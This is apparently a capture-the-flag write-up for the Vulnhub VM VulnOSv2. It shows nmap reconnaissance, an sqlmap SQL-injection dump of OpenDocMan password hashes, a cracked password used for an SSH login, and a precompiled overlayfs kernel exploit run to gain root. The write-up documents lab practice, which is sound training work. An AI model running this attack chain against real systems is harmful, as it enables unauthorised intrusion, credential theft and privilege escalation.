Find file History
Latest commit 2068c1e May 18, 2016 @dqi some formatting
Failed to load latest commit information. some formatting May 17, 2016

This is another writeup for a VM from Vulnhub, this one is by c4b3rw0lf.

Lets scan it:

_ nmap -sS -T4 -A -p-

Starting Nmap 7.12 ( ) at 2016-05-17 08:49 CEST
Nmap scan report for
Host is up (0.00064s latency).
Not shown: 65532 closed ports
22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 f5:4d:c8:e7:8b:c1:b2:11:95:24:fd:0e:4c:3c:3b:3b (DSA)
|   2048 ff:19:33:7a:c1:ee:b5:d0:dc:66:51:da:f0:6e:fc:48 (RSA)
|_  256 ae:d7:6f:cc:ed:4a:82:8b:e8:66:a5:11:7a:11:5f:86 (ECDSA)
80/tcp   open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: VulnOSv2
6667/tcp open  irc     ngircd
MAC Address: 08:00:27:A1:E2:43 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.4
Network Distance: 1 hop
Service Info: Host:; OS: Linux; CPE: cpe:/o:linux:linux_kernel
1   0.64 ms

OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 80.84 seconds

So there is ssh, a webserver and a IRC server.

On the webserver we get a link to /jabc, I spider this site, browse around a bit, and find something interesting in /jabc/?q=node/8

<p><span style="color:#000000">For security reasons, this section is hidden.</span></p>
<p><span style="color:#000000">For a detailed view and documentation of our products, please visit our documentation platform at /jabcd0cs/ on the server. Just login with guest/guest</span></p>

We follow along to /jabcd0cs/

Here we find OpenDocMan 1.2.7, seeing the copyright for this version only goes to 2013 I go to exploit db to see if there are any exploits.

So there is SqL-injection possible in the add_value parameter, I fire sqlmap and it and it gets some nice results.

sqlmap -u ''
-p add_value -D jabcd0cs --dump

We get the hash for the webmin user.

Database: jabcd0cs
Table: odm_user
[3 entries]
| id | phone        | Email              | username     | password                                 | last_name | first_name | department | pw_reset_code |
| 1  | 5555551212   | | webmin       | b78aae356709f8c31118ea613980954b         | min       | web        | 2          | <blank>       |
| 2  | 555 5555555  |  | guest        | 084e0343a0486ff05530df6c705c8bb4 (guest) | guest     | guest      | 2          | NULL          |
| 3  | 555-555-0199 | | Peter+Winter | 3d5bfcc2c4c3101c754087120572aaf7         | Winter    | Peter      | 1          | NULL          |

I paste this hash into the google and get back the plaintext.

result: webmin1980

We can ssh in as this user.

ssh webmin@                                                                                                                                                                                                 ⏎
webmin@'s password:
Welcome to Ubuntu 14.04.4 LTS (GNU/Linux 3.13.0-24-generic i686)

* Documentation:

 System information as of Tue May 17 08:49:07 CEST 2016

 System load: 0.0               Memory usage: 4%   Processes:       63
 Usage of /:  5.7% of 29.91GB   Swap usage:   0%   Users logged in: 0

 Graph this data and manage this system at:

Last login: Wed May  4 10:41:07 2016
$ id
uid=1001(webmin) gid=1001(webmin) groups=1001(webmin)

I get a shell on the server and do some recon, after not finding anything for a while I notice:

webmin@VulnOSv2:~$ uname -a
Linux VulnOSv2 3.13.0-24-generic #47-Ubuntu SMP Fri May 2 23:31:42 UTC 2014 i686 i686 i686 GNU/Linux

I go to kernel-exploits to check if this kernel is vulnerable to anything, and it is! There is even a precompiled exploit for us.

I copy it into webmins hope directory and...

webmin@VulnOSv2:~$ chmod +x ofs_32
webmin@VulnOSv2:~$ ./ofs_32
spawning threads
mount #1
mount #2
child threads done
/etc/ created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),1001(webmin)


# cat /root/flag.txt
Hello and welcome.
You successfully compromised the company "JABC" and the server completely !!
Congratulations !!!
Hope you enjoyed it.

What do you think of A.I.?

Good challenge, I liked exploring the sites looking for vulns, thanks to Vulnhub for hosting and thanks to c4b3rw0lf for creating it!